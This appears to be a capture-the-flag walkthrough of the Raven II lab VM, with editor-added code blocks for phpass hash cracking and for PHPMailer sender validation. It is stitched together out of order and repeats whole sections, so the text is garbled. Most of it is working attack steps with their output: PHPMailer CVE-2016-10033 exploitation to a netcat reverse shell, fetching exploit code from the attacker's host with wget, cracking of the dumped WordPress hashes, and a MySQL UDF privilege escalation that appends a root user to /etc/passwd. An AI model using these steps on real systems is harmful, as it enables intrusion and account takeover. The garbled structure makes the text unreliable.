| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql>
Let's try cracking those. I output them to file on my Kali box and run john:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
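For anyone who wants to see what john is actually doing here, the following is an added Python implementation (the editor's, not from the page) of WordPress's portable phpass scheme: "$P$", one character encoding log2 of the MD5 iteration count ("B" is 8192 rounds, which is why the rate is only a few thousand candidates per second), an 8-character salt, then the iterated MD5 in crypt-style base64. The two hashes are the ones dumped from wp_users above; the wordlist is constructed for the example.

```python
"""WordPress phpass ($P$) hash check, as an added example of what john is cracking above.

Editor's example, not code from the page. The two hashes are copied from the wp_users
dump above; CONSTRUCTED_WORDLIST is made up for the demo.
"""
import hashlib
import hmac
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hashes dumped from wp_users on Raven (from the page).
MICHAEL_HASH = "$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0"
STEVEN_HASH = "$P$B6X3H3ykawf2oHuPsbjQiih5iJXqad."

# Constructed wordlist for the demo (a real run uses rockyou.txt as the page does).
CONSTRUCTED_WORDLIST = ["password", "raven", "Raven2018", "LOLLOL1", "S3agull!"]


def _encode64(raw: bytes, count: int) -> str:
    """phpass's crypt-style base64: little-endian 24-bit groups, no padding."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Portable phpass hash of `password` under `setting` ('$P$' + count char + 8-char salt).

    Layout: md5(salt + pw), then 2**count_log2 rounds of md5(prev + pw); the 16-byte
    result is encoded to 22 characters and appended to the 12-character setting.
    """
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("salt too short")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_rounds(hash_str: str) -> int:
    """Iteration count encoded in the 4th character ('B' -> 2**13 = 8192, WordPress's default)."""
    return 1 << ITOA64.index(hash_str[3])


def check_password(hash_str: str, candidate: str) -> bool:
    """Recompute under the stored setting and compare the full string."""
    return hmac.compare_digest(phpass_hash(candidate, hash_str), hash_str)


def crack(hash_str: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: first candidate that reproduces the hash, or None."""
    for word in wordlist:
        if check_password(hash_str, word):
            return word
    return None


if __name__ == "__main__":
    for name, h in (("michael", MICHAEL_HASH), ("steven", STEVEN_HASH)):
        print(f"{name}: {phpass_rounds(h)} rounds, wordlist result: {crack(h, CONSTRUCTED_WORDLIST)}")
```

Each candidate costs 8193 MD5 calls, so the pure-Python loop manages on the order of a thousand candidates per second; john's AVX code above does about six times that, and rockyou.txt has over fourteen million entries, hence the 41-minute run.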
While that’s running, I check what version of mysql is running:
mysql> show variables like "%version%";
show variables like "%version%";
+-------------------------+------------------+
| Variable_name | Value |
+-------------------------+------------------+
| innodb_version | 5.5.60 |
| protocol_version | 10 |
| slave_type_conversions | |
| version | 5.5.60-0+deb8u1 |
| version_comment | (Debian) |
| version_compile_machine | x86_64 |
| version_compile_os | debian-linux-gnu |
+-------------------------+------------------+
7 rows in set (0.00 sec)
Reviewing my results from linuxprivchecker.py again, I see it suggests the MySQL UDF local privilege escalation exploit. The script matches on version strings, so its suggestions need a sanity check: the Debian OpenSSL PRNG item does not apply to a 2018 jessie build, but the UDF technique (exploit 1518) works on far newer MySQL than its title suggests, as long as mysqld runs as root and the DB account can write a shared library somewhere mysqld will load it from.
...
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
...
I've seen and used this before. The exploit is a small shared library exporting a user-defined function that calls system(); once mysqld loads it, commands run with mysqld's privileges, which on this box means root. That is enough to own the box: create new users, modify existing ones, or basically do anything you like!
First I serve the exploit from my Kali box (python -m SimpleHTTPServer) and fetch it on the target with wget.
www-data@Raven:/var/www$ wget http://192.168.253.131/1518.c
wget http://192.168.253.131/1518.c
converted 'http://192.168.253.131/1518.c' (ANSI_X3.4-1968) -> 'http://192.168.253.131/1518.c' (UTF-8)
--2019-02-03 08:18:09-- http://192.168.253.131/1518.c
Connecting to 192.168.253.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3378 (3.3K) [text/plain]
Saving to: '1518.c'
1518.c 100%[=====================>] 3.30K --.-KB/s in 0s
2019-02-03 08:18:09 (705 MB/s) - '1518.c' saved [3378/3378]
www-data@Raven:/var/www$
Following the exploit instructions I rename and compile it:
www-data@Raven:/var/www$ mv 1518.c n33dle.c
mv 1518.c n33dle.c
www-data@Raven:/var/www$ gcc -g -c n33dle.c
gcc -g -c n33dle.c
www-data@Raven:/var/www$ gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
With n33dle.so built, I log back into MySQL and follow the rest of the exploit instructions: load the library into a table, write it back out with INTO DUMPFILE to a directory mysqld loads plugins from, then create the function. Two checks worth doing first on a real target: SHOW VARIABLES LIKE 'plugin_dir' for where the library has to land, and SHOW VARIABLES LIKE 'secure_file_priv', which when set restricts where INTO DUMPFILE may write.
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/var/www/n33dle.so'));
insert into foo values(load_file('/var/www/n33dle.so'));
Query OK, 1 row affected (0.02 sec)
mysql> select * from foo into dumpfile '/var/www/n33dle.so';
select * from foo into dumpfile '/var/www/n33dle.so';
ERROR 1086 (HY000): File '/var/www/n33dle.so' already exists
mysql> select * from foo into dumpfile '/usr/lib/n33dle.so';
select * from foo into dumpfile '/usr/lib/n33dle.so';
Query OK, 1 row affected (0.01 sec)
mysql> create function do_system returns integer soname 'n33dle.so';
create function do_system returns integer soname 'n33dle.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+-----------+----------+
| name | ret | dl | type |
+-----------+-----+-----------+----------+
| do_system | 2 | n33dle.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)
What I've done here is register the do_system function from n33dle.so inside mysqld, so it can be called from SQL to run any system command with mysqld's privileges, root here. A trick I like is creating a new root user. In the past I've modified the existing root entry, removing the 'x' from /etc/passwd so I could su to root without a password, but that is noisy and can break things. Instead, let's append a new uid 0 user with a password I've set.
On my Kali box I generate a crypt(3) hash for the password 'n33dle' (openssl passwd with no algorithm flag produces the traditional DES format, which the target's crypt still accepts):
root@kali:~/Documents/raven# openssl passwd n33dle
RHV9/0Q6VW2nI
Using the hash above, I call do_system from MySQL to echo a new line into Raven's /etc/passwd. This creates a uid 0 user with username and password n33dle:n33dle:
mysql> select do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
<ho "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
Exit out of MySQL and it's as easy as switching to the newly created root-level user 'n33dle':
www-data@Raven:/var/www$ su n33dle
su n33dle
Password: n33dle
root@Raven:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www# whoami
whoami
root
root@Raven:/var/www#
And there we have it, I’m now root! To finish it off, the final flag:
root@Raven:/var/www# cd /root
cd /root
root@Raven:~# ls
ls
flag4.txt
root@Raven:~# cat flag4.txt
cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
CONGRATULATIONS on successfully rooting RavenII
I hope you enjoyed this second interation of the Raven VM
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
root@Raven:~#
The john run eventually finishes and recovers steven's password (john prints '(?)' for the username because the input file had none):
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
LOLLOL1 (?)
1g 0:00:41:01 DONE (2019-02-03 08:47) 0.000406g/s 5827p/s 6253c/s 6253C/s ..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I tried to SSH as steven with it, but that didn't work. They are WordPress creds, and they did let me log in to the WordPress admin portal, so perhaps there's some other route in there... Anyway, I'm done!
Hope you enjoyed.
--> n33dle
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2018-12-22 07:57:49 (GMT11) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
What stands out the most to me is the detection of a WordPress installation. Also of note is an older version of the Apache server (there may be some vulnerabilities here), as well as a few directory listings.
I navigate to the webpage (https://192.168.254.132) and have a look around. Nothing really stands out to me. There is an admin login page on the WordPress portal. I also notice it’s running the twentyseventeen plugin from the comments in the server response. (Perhaps some vulns there..?)
Before I start a brute-force attempt on the login screen I fire off a scan using wpscan.
root@kali:~# wpscan --url http://192.168.253.132/wordpress --wp-content-dir wp-content
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|Version 3.4.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.253.132/wordpress/
[+] Started: Sat Dec 22 09:18:01 2018
Interesting Finding(s):
[+] http://192.168.253.132/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.253.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.253.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.253.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.8.8 identified (Latest, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'WordPress 4.8.8'
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==============================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Sat Dec 22 09:18:04 2018
[+] Requests Done: 38
[+] Cached Requests: 6
[+] Data Sent: 7.229 KB
[+] Data Received: 24.328 KB
[+] Memory used: 51.105 MB
[+] Elapsed time: 00:00:02
root@kali:~#
A few things, but first I look at the detection of an uploads directory and navigate to it. Here I find my first flag located in ../2018/11/flag3.png:
I also notice in the server response (burp screenshot) the comments reference the server as raven.local. In the past (my GoldenEye vulnhub walkthrough was an example), you can sometimes bypass server-side filters if you address the server using its FQDN. To do this, I add raven.local into my local hosts file:
root@kali:~# echo "192.168.253.132 raven.local" >> /etc/hosts
This doesn’t seem to help me or lead me anywhere, but I do it anyway 😊
After looking through the site for a while, next I kick off a dirbuster directory scan. Quite a few results come back. To filter out most of the repeated subdirectories and only output the parent directories, I run the following:
root@kali:~/Documents/raven# cat DirBusterReport-raven.local-80.txt | cut -d "/" -f 2 | sort -u
--------------------------------
about.html
contact.php
css
DirBuster 1.0-RC1 - Report
Directories found during testing:
Dirs found with a 200 response:
Dirs found with a 403 response:
Files found during testing:
Files found with a 200 responce:
Files found with a 301 responce:
Files found with a 403 responce:
Files found with a 500 responce:
icons
img
index.html
js
manual
.php
Report produced on Sat Feb 02 16:51:38 AEDT 2019
service.html
team.html
vendor
wordpress
The directory that instantly sticks out is the vendor directory. Looking around I find a PATH page here http://raven.local/vendor/PATH which leads me to flag1!
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
I noticed this is an installation directory of PHPMailer. Opening the http://raven.local/vendor/VERSION page I find it’s running version: 5.2.16.
root@kali:~# searchsploit phpmailer
--------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScr | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
--------------------------------------------------------------------------------------------------- ----------------------------------------
Cha-ching. I think I’m onto something here. Rather than using the Metasploit module, I look at the python-based exploit.
Reading through the python RCE and the CVE details (https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html), in summary, the vulnerability that is exploited exists in the mail() function within PHPMailer.
The application uses setFrom() to take input from the sending user (this should be the sender's email address). Under the hood, it's using sendmail. Looking around the site further, I find the contact.php page allows a site visitor to enter their email address. I assume the PHPMailer program is what’s used to provide this service.
From reading the vulnerability further, it seems this vulnerable version of PHPMailer does not appropriately filter the third parameter within the sendmail command. This allows an attacker to essentially break out of the third parameter through escaping, and insert their own arbitrary code.
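To make the defensive side of this concrete, here is an added example (my own code, not PHPMailer's and not part of the original walkthrough) of the two things that stop a sender-address argument injection: a strict allow-list check on the address before it goes anywhere near the MTA, and building the MTA command as an argv list rather than a shell string. The function and constant names, the sendmail path and the sample contact-form submissions are all assumptions constructed for the example.

```python
import re

# Conservative allow-list for an address that will be handed to a mail
# transfer agent on its command line. Quoted local-parts, whitespace and
# shell metacharacters are exactly what an argument-injection attempt needs,
# so none of them are permitted here (this is stricter than RFC 5322 allows).
_SAFE_ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_safe_sender(address):
    """Return True only for an address that is safe to use as the envelope sender."""
    if not isinstance(address, str) or len(address) > 254:
        return False
    # A leading '-' would be parsed by the MTA as an option, even inside argv.
    if address.startswith("-"):
        return False
    if any(c.isspace() for c in address):
        return False
    return _SAFE_ADDRESS.fullmatch(address) is not None


def build_sendmail_argv(sender, sendmail_path="/usr/sbin/sendmail"):
    """Build the MTA command as an argv list, never as a shell string.

    Because no shell is involved, the sender can only ever be a single
    argument. The validation above is still applied so that an MTA option
    cannot be smuggled in through that single argument either.
    Raises ValueError instead of forwarding a rejected sender.
    """
    if not is_safe_sender(sender):
        raise ValueError("rejected sender address: %r" % sender)
    return [sendmail_path, "-t", "-i", "-f" + sender]


def unsafe_shell_command(sender):
    """The anti-pattern for comparison: interpolating the sender into a shell
    command line. Anything in `sender` that the shell treats as a separator
    becomes additional MTA arguments. Shown only to contrast with the argv form."""
    return "/usr/sbin/sendmail -t -i -f%s" % sender


def triage_submissions(submissions):
    """Detection angle: given (client_ip, email) pairs logged from a contact
    form, return the ones whose sender would have been rejected. These are the
    events worth alerting on."""
    return [(ip, email) for ip, email in submissions if not is_safe_sender(email)]


# Constructed sample submissions (assumed, not from any real log).
SAMPLE_SUBMISSIONS = [
    ("10.0.0.5", "michael@raven.org"),
    ("10.0.0.9", '"a" b@raven.local'),      # quoted local-part plus whitespace
    ("10.0.0.7", "-f@raven.local"),         # would be parsed as an MTA option
    ("10.0.0.8", "steven@raven.org"),
]

if __name__ == "__main__":
    print(build_sendmail_argv("michael@raven.org"))
    for ip, email in triage_submissions(SAMPLE_SUBMISSIONS):
        print("suspicious sender from %s: %r" % (ip, email))
```

The point of the argv form is that even a validator bypass cannot turn one address into several arguments; the point of the validator is that the MTA itself still parses option-looking values, so both layers are needed.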
With this information, I update the exploit:
- Target: Change to the contact.php page (this is what’s used to trigger the vuln)
- Backdoor: This is the name of the malicious php (exploit) that will be uploaded
- IP/Port: This is changed to my kali machine for the reverse shell
root@kali:~/Documents/raven# python 40974.py
I open another terminal and create a netcat listener on tcp/443 to accept an incoming reverse shell:
root@kali:~# nc -lvp 443
listening on [any] 443 ...
To trigger the exploit, I execute the reverse shell by navigating to the uploaded n33dle.php file:
root@kali:~/Documents/raven# curl http://192.168.253.132/n33dle.php
And there you have it, a shell. Nice.
root@kali:~# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.253.131] from raven.local [192.168.253.132] 41127
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:c6:56:e8
inet addr:192.168.253.132 Bcast:192.168.253.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fec6:56e8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:208 errors:0 dropped:0 overruns:0 frame:0
TX packets:233 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17195 (16.7 KiB) TX bytes:28320 (27.6 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:91 errors:0 dropped:0 overruns:0 frame:0
TX packets:91 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13578 (13.2 KiB) TX bytes:13578 (13.2 KiB)
$ hostname
Raven
$
As usual, I spawn a python tty shell using:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$
I also locate flag2.txt sitting in www-data’s home directory:
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}
www-data@Raven:/var/www$
--> TIME TO PE
Let’s look at what OS and Kernel we’re running:
www-data@Raven:/var/www/html$ uname -ra
uname -ra
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
www-data@Raven:/var/www/html$ cat /etc/*release
cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
www-data@Raven:/var/www/html$
Debian 8 (Jessie) on Linux 3.16.0-6-amd64.
And a quick look at any additional users on the system:
www-data@Raven:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
smmta:x:108:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
steven:x:1001:1001::/home/steven:/bin/sh
There’s a michael and steven account. Let’s see what groups they’re members of:
www-data@Raven:/home$ id steven
id steven
uid=1001(steven) gid=1001(steven) groups=1001(steven)
www-data@Raven:/home$ id michael
id michael
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
www-data@Raven:/home$
Hmmm, nothing really of interest at this stage. Looking at their home drives, nothing interesting here either:
www-data@Raven:/$ ls -laR /home
ls -laR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 Aug 13 13:51 .
drwxr-xr-x 22 root root 4096 Aug 13 07:38 ..
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 michael
drwxr-xr-x 2 root root 4096 Aug 13 14:20 steven
/home/michael:
total 20
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
-rw-r--r-- 1 michael michael 220 Aug 13 07:52 .bash_logout
-rw-r--r-- 1 michael michael 3515 Aug 13 07:52 .bashrc
-rw-r--r-- 1 michael michael 675 Aug 13 07:52 .profile
/home/steven:
total 8
drwxr-xr-x 2 root root 4096 Aug 13 14:20 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
www-data@Raven:/$
I run the linuxprivchecker.py tool and analyse its output. I notice the wp-config.php file is world-writable, and it has also been modified by www-data. Obviously, this has been modified by the VM creator.
Reading its contents, I find some local DB creds.
www-data@Raven:/var/www$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
I also confirm a MySQL server is running locally:
www-data@Raven:/var/www$ netstat -tl
netstat -tl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:48453 *:* LISTEN
tcp 0 0 localhost:mysql *:* LISTEN
tcp 0 0 localhost:submission *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 localhost:smtp *:* LISTEN
tcp6 0 0 [::]:54187 [::]:* LISTEN
tcp6 0 0 [::]:sunrpc [::]:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
tcp6 0 0 [::]:ssh [::]:* LISTEN
Let’s try connecting:
www-data@Raven:/var/www$ mysql -h localhost -u root -p
mysql -h localhost -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql>
Awesome. Now let’s have a quick snoop around. Check the users:
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql>
Let's try cracking those. I output them to a file on my Kali box and run john:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
While that’s running, I check what version of mysql is running:
mysql> show variables like "%version%";
show variables like "%version%";
+-------------------------+------------------+
| Variable_name | Value |
+-------------------------+------------------+
| innodb_version | 5.5.60 |
| protocol_version | 10 |
| slave_type_conversions | |
| version | 5.5.60-0+deb8u1 |
| version_comment | (Debian) |
| version_compile_machine | x86_64 |
| version_compile_os | debian-linux-gnu |
+-------------------------+------------------+
7 rows in set (0.00 sec)
Reviewing my results again from linuxprivchecker.py, I see the mysql version is vuln to the UDF local privilege escalation exploit.
...
